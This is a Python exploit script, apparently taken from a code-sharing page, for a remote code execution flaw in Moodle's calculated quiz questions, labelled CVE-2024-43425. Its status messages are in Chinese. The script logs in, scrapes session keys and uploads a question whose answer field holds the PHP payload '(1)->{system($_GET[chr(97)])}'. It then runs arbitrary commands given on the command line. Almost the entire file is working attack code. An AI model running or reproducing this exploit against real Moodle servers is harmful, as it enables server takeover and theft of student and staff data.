1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
|
import argparse
import requests
import re
import sys
import subprocess
from bs4 import BeautifulSoup
import urllib.parse
requests.packages.urllib3.disable_warnings()
def get_login_token(session, login_url):
print("[*] 步骤1: 获取/login/index.php以提取登录令牌")
try:
response = session.get(login_url, verify=False)
if response.status_code != 200:
print(f"[-] 访问登录页面时出现意外状态码 {response.status_code}")
sys.exit(1)
except Exception as e:
print(f"[-] 连接 {login_url} 时出错: {e}")
sys.exit(1)
soup = BeautifulSoup(response.text, "html.parser")
token_input = soup.find("input", {"name": "logintoken"})
if not token_input or not token_input.get("value"):
print("[-] 无法从HTML中提取登录令牌")
sys.exit(1)
token = token_input["value"]
print(f"[+] 找到登录令牌: {token}")
return token
def perform_login(session, login_url, username, password, token):
print("[*] 步骤2: 使用凭据POST /login/index.php")
login_payload = {
"anchor": "",
"logintoken": token,
"username": username,
"password": password,
}
try:
response = session.post(
login_url,
data=login_payload,
headers={"Content-Type": "application/x-www-form-urlencoded"},
verify=False,
)
if response.status_code not in [200, 303]:
print(f"[-] 登录过程中出现意外响应码: {response.status_code}")
sys.exit(1)
except Exception as e:
print(f"[-] 登录POST失败: {e}")
sys.exit(1)
if "MoodleSession" not in session.cookies.get_dict():
print("[-] 登录可能失败: 缺少MoodleSession cookie")
sys.exit(1)
print("[+] 登录成功。")
def get_quiz_info(session, base_url, cmid):
print("[*] 从测验编辑页面提取sesskey、courseContextId和category...")
quiz_edit_url = f"{base_url}/mod/quiz/edit.php?cmid={cmid}"
try:
resp = session.get(quiz_edit_url, verify=False)
if resp.status_code != 200:
print(f"[-] 加载测验编辑页面失败。状态: {resp.status_code}")
sys.exit(1)
# 提取sesskey
sesskey_match = re.search(r'"sesskey":"([a-zA-Z0-9]+)"', resp.text)
# 提取courseContextId
ctxid_match = re.search(r'"courseContextId":(\d+)', resp.text)
# 提取category
category_match = re.search(r';category=(\d+)', resp.text)
if not (sesskey_match and ctxid_match and category_match):
print("[-] 无法提取sesskey、courseContextId或category")
print(resp.text[:1000])
sys.exit(1)
sesskey = sesskey_match.group(1)
ctxid = ctxid_match.group(1)
category = category_match.group(1)
print(f"[+] 找到sesskey: {sesskey}")
print(f"[+] 找到courseContextId: {ctxid}")
print(f"[+] 找到category: {category}")
return sesskey, ctxid, category
except Exception as e:
print(f"[-] 提取测验信息时出现异常: {e}")
sys.exit(1)
def upload_calculated_question(session, base_url, sesskey, cmid, courseid, category, ctxid):
print("[*] 步骤3: 上传包含payload的计算题...")
url = f"{base_url}/question/bank/editquestion/question.php"
payload = "(1)->{system($_GET[chr(97)])}"
post_data = {
"initialcategory": 1,
"reload": 1,
"shuffleanswers": 1,
"answernumbering": "abc",
"mform_isexpanded_id_answerhdr": 1,
"noanswers": 1,
"nounits": 1,
"numhints": 2,
"synchronize": "",
"wizard": "datasetdefinitions",
"id": "",
"inpopup": 0,
"cmid": cmid,
"courseid": courseid,
"returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0",
"mdlscrollto": 0,
"appendqnumstring": "addquestion",
"qtype": "calculated",
"makecopy": 0,
"sesskey": sesskey,
"_qf__qtype_calculated_edit_form": 1,
"mform_isexpanded_id_generalheader": 1,
"category": f"{category},{ctxid}",
"name": "exploit",
"questiontext[text]": "<p>test</p>",
"questiontext[format]": 1,
"questiontext[itemid]": 623548580,
"status": "ready",
"defaultmark": 1,
"generalfeedback[text]": "",
"generalfeedback[format]": 1,
"generalfeedback[itemid]": 21978947,
"answer[0]": payload,
"fraction[0]": 1.0,
"tolerance[0]": 0.01,
"tolerancetype[0]": 1,
"correctanswerlength[0]": 2,
"correctanswerformat[0]": 1,
"feedback[0][text]": "",
"feedback[0][format]": 1,
"feedback[0][itemid]": 281384971,
"unitrole": 3,
"penalty": 0.3333333,
"hint[0][text]": "",
"hint[0][format]": 1,
"hint[0][itemid]": 812786292,
"hint[1][text]": "",
"hint[1][format]": 1,
"hint[1][itemid]": 795720000,
"tags": "_qf__force_multiselect_submission",
"submitbutton": "Save changes"
}
try:
res = session.post(url, data=post_data, verify=False, allow_redirects=False)
if res.status_code in [302, 303] and "Location" in res.headers and "&id=" in res.headers["Location"]:
print("[+] 问题上传请求已发送。从重定向中提取问题ID。")
qid = re.search(r"&id=(\d+)", res.headers["Location"])
if not qid:
print("[-] 无法从重定向中提取问题ID。")
sys.exit(1)
return qid.group(1)
else:
print(f"[-] 上传失败。状态码: {res.status_code}")
sys.exit(1)
except Exception as e:
print(f"[-] 上传异常: {e}")
sys.exit(1)
def post_dataset_wizard(session, base_url, question_id, sesskey, cmid, courseid, category, ctxid):
print("[*] 步骤4: 使用dataset[0]=0完成数据集向导")
wizard_url = f"{base_url}/question/bank/editquestion/question.php?wizardnow=datasetdefinitions"
data_payload = {
"id": question_id,
"inpopup": 0,
"cmid": cmid,
"courseid": courseid,
"returnurl": f"/mod/quiz/edit.php?cmid={cmid}&addonpage=0",
"mdlscrollto": 0,
"appendqnumstring": "addquestion",
"category": f"{category},{ctxid}",
"wizard": "datasetitems",
"sesskey": sesskey,
"_qf__question_dataset_dependent_definitions_form": 1,
"dataset[0]": 0,
"synchronize": 0,
"submitbutton": "Next page"
}
try:
res = session.post(wizard_url, data=data_payload, verify=False)
if res.status_code == 200:
print("[+] 数据集向导POST已提交。")
return False
elif "Exception - system(): Argument #1 ($command) cannot be empty" in res.text:
print("[+] 达到预期错误页面。Payload正在被解释。")
return True
else:
print(f"[-] 数据集向导POST失败,状态: {res.status_code}")
return False
except Exception as e:
print(f"[-] 数据集向导步骤中出现异常: {e}")
return False
def trigger_rce(session, base_url, question_id, category, cmid, courseid, cmd):
print(f"[*] 步骤5: 触发命令: {cmd}")
encoded = urllib.parse.quote(cmd)
trigger_url = (
f"{base_url}/question/bank/editquestion/question.php?id={question_id}"
f"&category={category}&cmid={cmid}&courseid={courseid}"
f"&wizardnow=datasetitems&returnurl=%2Fmod%2Fquiz%2Fedit.php%3Fcmid%3D{cmid}%26addonpage%3D0"
f"&appendqnumstring=addquestion&mdlscrollto=0&a={encoded}"
)
try:
resp = session.get(trigger_url, verify=False)
print("[+] 触发请求已发送。输出如下:\n")
lines = resp.text.splitlines()
output_lines = []
for line in lines:
if "<html" in line.lower():
break
if line.strip():
output_lines.append(line.strip())
print("[+] 命令输出(前几行):")
print("\n".join(output_lines[:2]) if output_lines else "[!] 未检测到输出。")
except Exception as e:
print(f"[-] 触发命令时出错: {e}")
sys.exit(1)
def main():
parser = argparse.ArgumentParser(description="Moodle CVE-2024-43425 漏洞利用")
parser.add_argument("--url", required=True, help="目标Moodle基础URL")
parser.add_argument("--username", required=True, help="Moodle用户名")
parser.add_argument("--password", required=True, help="Moodle密码")
parser.add_argument("--courseid", required=True, help="课程ID")
parser.add_argument("--cmid", required=True, help="课程模块ID(测验)")
parser.add_argument("--cmd", required=True, help="远程执行的命令(例如'whoami'或'cat /flag')")
args = parser.parse_args()
session = requests.Session()
login_url = f"{args.url.rstrip('/')}/login/index.php"
token = get_login_token(session, login_url)
perform_login(session, login_url, args.username, args.password, token)
sesskey, ctxid, category = get_quiz_info(session, args.url.rstrip('/'), args.cmid)
question_id = upload_calculated_question(session, args.url.rstrip('/'), sesskey, args.cmid, args.courseid, category, ctxid)
if not post_dataset_wizard(session, args.url.rstrip('/'), question_id, sesskey, args.cmid, args.courseid, category, ctxid):
sys.exit(1)
trigger_rce(session, args.url.rstrip('/'), question_id, category, args.cmid, args.courseid, args.cmd)
if __name__ == "__main__":
main()
|